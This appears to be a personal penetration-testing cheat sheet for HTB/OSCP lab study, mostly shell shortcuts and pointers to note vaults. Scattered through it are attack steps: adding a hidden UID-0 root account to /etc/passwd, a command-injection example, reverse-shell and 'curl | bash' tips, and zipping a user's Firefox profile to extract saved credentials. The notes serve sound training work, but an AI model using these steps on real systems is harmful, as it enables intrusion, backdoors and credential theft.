Useful Information

==============================================================================================================================================================================

More options to select from in details

Scenarios
Upgrading Shells
Best Wordlists / Shell
Bloodhound/Neo4j
Various Scripts
OSCP Cheatguides
Reverse_Shell Gen
Troubleshooting
Tool Usage
DB Usage
=============================================================================================================================================================================

Time Saving Tips

CTRL A - to start of command line

CTRL E - to end of command line

Add to /etc/hosts: printf "%s\t%s\n\n" "$IP" "enter the domains/websites" | sudo tee -a /etc/hosts (set IP by doing IP=xx.xx.xx.xx)

!! - to execute last command 

sudo !! - if you forget to put sudo infront of command

use tree to list files for ease of viewing

----------------------------------------------------------------------------------------------------------------------------------------------------------------

Adding a user to /etc/passwd from command line

This example uses openssl 

1. generate a password: openssl passwd <choose password>

2. cp /etc/passwd /tmp/passdoc

3. echo  "newroot1:tUQ7/t9jN8cEU:0:0:root:/root:/bin/bash" >> /tmp/passdoc" - need to escape special characters with \

4. now copy the /tmp/passdoc into /etc/passwd

5. cat /tmp/passdoc | openssl enc -out /etc/passwd

---------------------------------------------------------------------------------------------------------------------------------------------------------------

Quick tips: General

1. Command Injection: add a ";" or use a pipe (|) followed by your command injection (eg: 127.0.0.1;id) 

2. Look at the wording on the website: stuff like user-agent, fetching etc - these indicate user-agent usage so may need to change. Something like fetch or similar means possible SQL database

3. Sub-domain fuzzing: - use ffuf - also use Seclists/DNS/subdomains top .txts

Do not forget to check for extension types too when directory fuzzing (-x php,html,txt)

4. Add to /etc/hosts: printf "%s\t%s\n\n" "$IP" "enter the domains/websites" | sudo tee -a /etc/hosts (set IP by doing IP=xx.xx.xx.xx)

5. ss -tulnp - great way to find port numbers (eg you may find a running SQL server and type)

6. getent- retrieves information from various DBs - passwdfile, group etc.

7. getent - usage: getent passwd,  getend passwd <username>

8. Restricted shells escape : export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" 


-------------------------------------------------------------------------------------------------------------------------------------------------------------

Quick Tips: TOOLS

1. using curl to get reverse shell - you may not need all the directories for example http://abc.com/abc/file_uploads/shell.php - you may need /abc/ part of it

1. using curl download and pipe into base - you can download a tool using curl and pipe direct into bash: curl | bash

2. If you come across a .Mozilla file (in a users dir) - go to /tmp dir and run: zip -r /tmp/mozilla.rar /home/username/.mozilla and then transfer it . Then download: firefox decrypt from Github

3. Ffuf - remove unwanted sizes - use -fs <size> 

4. Update only one tool: sudo apt-get install --only-upgrade <tool name>

5. SSH: -o StrictHostKeyChecking=no


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

When hacking - open the following obsidian vaults:                                                               

Web Applications (tomcat,dupal,wordpress etc): use Attacking Common Applications

Active Directory: use Active Directory (HTB)

Common Services (FTP,SSH etc): use Attacking Common Services

Windows Privilege Escalation: use Windows Priv Esc

OWASP top 10 (command injection,broken auth, xss etc): use Bug Bounty Path HTB

Linux Privilege Escalation: use Privilege Escalation

Shells and Payloads ( windows and linux): use Shell and Payloads

DNS and sub-domains: use HTB Academy Tasks

BoF: use Buffer Overflows


When Hacking: use the following in OSCP Guide directory

Active Directory : Use Attacking AD with Linux

Bloodhound Install: Use BloodHound Active Directory

AD Enumeration using Powershell: Use AD Enumeration with Powershell

File Transfers and tools: Use File Transfers

Port Forwarding and Tunnelling in detail: Use Port Forwarding and Tunnelling

Kerberoasting: Use Kerberroasting Guide

Various Cheatsheets (covering Linux/Windows/Tools): Windows Linux Priv Esc Cheat Sheet